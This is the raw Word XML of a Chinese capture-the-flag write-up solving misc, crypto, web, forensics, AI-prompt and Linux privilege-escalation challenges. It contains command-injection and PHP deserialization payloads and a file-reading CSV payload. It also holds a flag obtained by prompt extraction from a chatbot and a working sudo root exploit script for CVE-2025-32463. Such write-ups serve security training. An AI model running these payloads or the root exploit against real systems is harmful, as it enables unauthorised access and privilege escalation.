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6073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Misc-被篡改的PLC指令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3385F34C">
      <w:p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ssh连接，搜索modbus_attack.pcapng</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62FE8A67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9865" cy="736600"/>
            <wp:effectExtent l="0" t="0" r="698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C895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下载wireshark打开，最后几个tcp包中发现flag，拼接即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540A1EB9">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5266055" cy="1866265"/>
            <wp:effectExtent l="0" t="0" r="1079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6E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flag{1694af8f1088a679f5369686aa9a7b32}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26845574">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CCE135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Misc-基米我们的感情好像叮咚鸡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打开附件word，第一段用零宽字节解密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2942F8E3">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271135" cy="2207895"/>
            <wp:effectExtent l="0" t="0" r="571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1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得到flag第一段：flag1:flag{55bdc09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word改zip解压后提取图片image1.png，发现lsb隐写获取第二段flag：80de-035a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD8A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4897120"/>
            <wp:effectExtent l="0" t="0" r="4445" b="17780"/>
            <wp:docPr id="11" name="图片 11" descr="7609e88e9aa2ec196f0c28015572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609e88e9aa2ec196f0c280155721f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7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Word提取出的image2.GIF，逐帧分解后，对应图片转成二进制字符串</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E7F5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001011010011010000110101001100110011001000101101011000010011011000110101001101110110011000110110</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBAB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得到flag中间：-4532-a657f6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B8E61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最后根据提示判断有snow隐写，word解压后的资源中有enc1.html文件，用文档中出现的截止日期0602解密得到最后一段flag：5320ab}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3FAD2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66065"/>
            <wp:effectExtent l="0" t="0" r="1270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3F947">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D0F8BC9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完整flag：flag{55bdc09b-80de-035a-4532-a657f65320ab}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B968F0D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AE2CB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Crypto-回到原点</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="26D486BB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="195" w:line="186" w:lineRule="auto"/>
        <w:ind w:left="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>把原始文件异或得到一个声音文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B11FC5">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="195" w:line="186" w:lineRule="auto"/>
        <w:ind w:left="5"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>RX－SSTV分析得到数字。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E92C8D4">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="195" w:line="186" w:lineRule="auto"/>
        <w:ind w:left="5"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5847715" cy="4159885"/>
            <wp:effectExtent l="0" t="0" r="63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FE1C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="195" w:line="186" w:lineRule="auto"/>
        <w:ind w:left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解Base64编码后得到flag{I7arEM00a1yl2B}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434AF898">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EEFD789">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00302932">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="385125A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Web-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>运维系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A6EB5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paste命令绕过正则，*绕过文件名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047AD5E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cmd=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1&amp;paste k*hp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE16DBB">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5263515" cy="3215005"/>
            <wp:effectExtent l="0" t="0" r="1333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9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flag{1502704a21fcae776ba53b4530bee657}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E333604">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="442CA1C8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Web-好简单的反序列化</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0393C31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Exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBE85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5DDCAA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highlight_file(__FILE__);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A96B0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//error_reporting(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B27B2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Lei1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5032A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D837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5C44E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Evil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17E1DA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//flag.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB36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0B321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__destruct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3A0477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AD57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62B7A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__wakeup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(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30FBF3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D36AA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24C50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B4A31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Lei2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B7728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8D950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4E277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3C005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Evil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3E458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D7FC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23E4F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8BAB8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E0607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$get = $_GET[1];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD9E0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$b = unserialize($get);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD90448">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09ECA3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Lei1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597AE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"flag.php"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7AECD8">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76ECD9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Lei2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7A9AD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32E16B">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A225A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A4344F">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53C191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serialize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B66E3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B6832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1A24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echo urlencode($s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F6CCBC">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="575EE9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echo "\n";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677FEF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$ss = 'O:4:"Lei2":1:{s:1:"c";O:4:"Lei1":3:{s:1:"a";N;s:4:"file";s:8:"flag.php";}}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0835EF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$ss = 'O:4:"Lei2":1:{s:1:"c";O:4:"Lei1":3:{s:1:"a";r:1;s:4:"file";s:8:"flag.php";}}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116C73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echo urlencode($ss);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD9F8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7F0CD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提交获取flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679389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flag{3853b71c2792ef77e5eb3c5ead19cec6}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E169C1"/>
    <w:p w14:paraId="4FF8068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Web-你知道我的密码吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2E234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Php反序列化字符绕过，构造payload造成password反序列化后为123456</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DBEC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3F5400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1CA98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user=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}&amp;age=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE092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B9C44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){                    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0045C1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str_replace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'xx'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2D31B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05958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'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx";i:1;s:6:"123456";}'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2776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"abcbc"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653D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';i:1;s:6:"123456";i:2;s:1:"1";}";'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B6C1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8A01C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serialize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D33A3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9CDC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unserialize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F43D5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if($user[1] === "123456"){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D00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    echo $flag;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9FE7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}else{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7959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    echo "nonono";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03882D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};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655950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var_dump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E570951">
      <w:r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flag{1c9428b53bc46e3fcf27871e8506925c}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719F5AED"/>
    <w:p w14:paraId="687066D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数据安全-数据净化器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D0B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上传包含以下payload的csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC9A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raw_data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE82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[open('/flag').read()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCDF1A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486660"/>
            <wp:effectExtent l="0" t="0" r="762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9F039">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r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flag{c306725c438bb5b7e3070e318691f3d2}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48071AEE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13376845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数据安全-你看看你的Windows7后面呢</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C8640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volatility分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B735FB1">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="3010535"/>
            <wp:effectExtent l="0" t="0" r="4445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D87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consoles中获取到一串字符335d366f5d6031767631707f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D999B53">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5270500" cy="1094105"/>
            <wp:effectExtent l="0" t="0" r="635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B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环境变量中可以看到提示是异或加密</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A190AE">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="615315"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1333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6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尝试0-255逐个去异或335d366f5d6031767631707f，可获取flag后半段</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48EDE81A">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2028825" cy="695325"/>
            <wp:effectExtent l="0" t="0" r="9525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E1D45"/>
    <w:p w14:paraId="06B75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通过异或hash获取前半部分flag：you_are_good_but</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192282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Md5获取完整flag：flag{5a79b268b4e81549f92420aeff8625fd}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003D8126"/>
    <w:p w14:paraId="65C675E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AI-和聪明的吊椅宝宝聊天吧亲</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDCE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提示词获取flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B458BE">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="6017260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B9F4">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="5761355"/>
            <wp:effectExtent l="0" t="0" r="508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6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7B40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7"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>获取flag</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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7"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>flag{d6ae623c85db4ece27fb594573a9ca84}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48074B7E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7"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618BBC28">
      <w:p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27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="188C21E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts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7"/>
          <w:szCs w:val="27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7"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>主机安全-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212121"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>最近还好吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C36D5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212121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212121"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>CVE-2025-32463，linux提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7E259C">
      <w:pP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212121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212121"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>下载提权脚本执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5664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#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF1F8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sudo-chwoot.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058BC3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CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401F6B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                 @ Stratascale Cyber Research Unit (CRU)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271E1E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mktemp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-d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/tmp/sudowoot.stage.XXXXXX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A9B8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?}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587C758D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97F5F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$#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];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then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F9E0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"/bin/bash"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0303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237233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$@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</w:p>
    <w:p w14:paraId="6EBF70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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59936F1D">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1572E0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CMD_C_ESCAPED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$(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'%s'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$CMD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-e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's/\\/\\\\/g'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-e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's/"/\\"/g'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F5CFC1">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61189C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woot1337.c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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F04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#include &lt;stdlib.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2826AE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#include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35567849">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FD5FD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__attribute__((constructor)) void woot(void) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090817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setreuid(0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16DFF2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setregid(0,0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094581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chdir("/");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C63F6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execl("/bin/sh", "sh", "-c", "${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CMD_C_ESCAPED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}", NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B866C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7D46C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EOF</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0574456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D7A9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mkdir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-p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woot/etc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libnss_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5ACC73">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC7B8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"passwd: /woot1337"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woot/etc/nsswitch.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46659C41">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29BB48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/etc/group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woot/etc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D57735">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BBF56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-shared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-fPIC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-Wl,-init,woot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-o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libnss_/woot1337.so.2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woot1337.c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14399D1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51849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"woot!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C3FE2C">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04B200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-R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woot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419BFE8E">
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:widowControl/>
        <w:suppressLineNumbers w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="172305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-rf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?}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EA8758">
      <w:pP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212121"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:shd w:val="clear" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17D7582B">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4524375" cy="26289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D7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flag{1e62a3012d133f96e06cbbce6b5564d6}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A6760"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CBEA676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158EB"/>
    <w:rsid w:val="0D9E5626"/>
    <w:rsid w:val="0EFB5712"/>
    <w:rsid w:val="18227BBE"/>
    <w:rsid w:val="1AC11F06"/>
    <w:rsid w:val="1E5141B8"/>
    <w:rsid w:val="21EA6A1B"/>
    <w:rsid w:val="22010E3A"/>
    <w:rsid w:val="28873FA5"/>
    <w:rsid w:val="2E291E44"/>
    <w:rsid w:val="39185C28"/>
    <w:rsid w:val="3C577B7C"/>
    <w:rsid w:val="3D703636"/>
    <w:rsid w:val="3E384F53"/>
    <w:rsid w:val="48452B9F"/>
    <w:rsid w:val="4B570652"/>
    <w:rsid w:val="4D1B0B31"/>
    <w:rsid w:val="4EFB0E6A"/>
    <w:rsid w:val="4F33202B"/>
    <w:rsid w:val="4FF544EF"/>
    <w:rsid w:val="50CF01D2"/>
    <w:rsid w:val="5A276988"/>
    <w:rsid w:val="5C0E6896"/>
    <w:rsid w:val="5D4B0E96"/>
    <w:rsid w:val="5E2F22B0"/>
    <w:rsid w:val="5FA56447"/>
    <w:rsid w:val="6FA06B69"/>
    <w:rsid w:val="716414EC"/>
    <w:rsid w:val="724511EA"/>
    <w:rsid w:val="75AE2CBC"/>
    <w:rsid w:val="78B92730"/>
    <w:rsid w:val="79374D38"/>
    <w:rsid w:val="7B2A5E81"/>
    <w:rsid w:val="7BB816DF"/>
    <w:rsid w:val="7C5E6EF9"/>
    <w:rsid w:val="7D330F52"/>
    <w:rsid w:val="7D5B4A17"/>
    <w:rsid w:val="7EBB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2025-09-11T04:13:23Z</dcterms:created>
  <dc:creator>Administrator</dc:creator>
  <cp:lastModifiedBy>亮</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-11T09:53:45Z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eyJoZGlkIjoiM2IwNTZjZTNkYmQ0OTY1ZTdhMTI0NWQxMjZjZDE3YjEiLCJ1c2VySWQiOiIxMjc1NDY5OTk4In0=</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="ICV">
    <vt:lpwstr>1DE702A00D3C48D08E59724D1A39CCC8_12</vt:lpwstr>
  </property>
</Properties>
</file>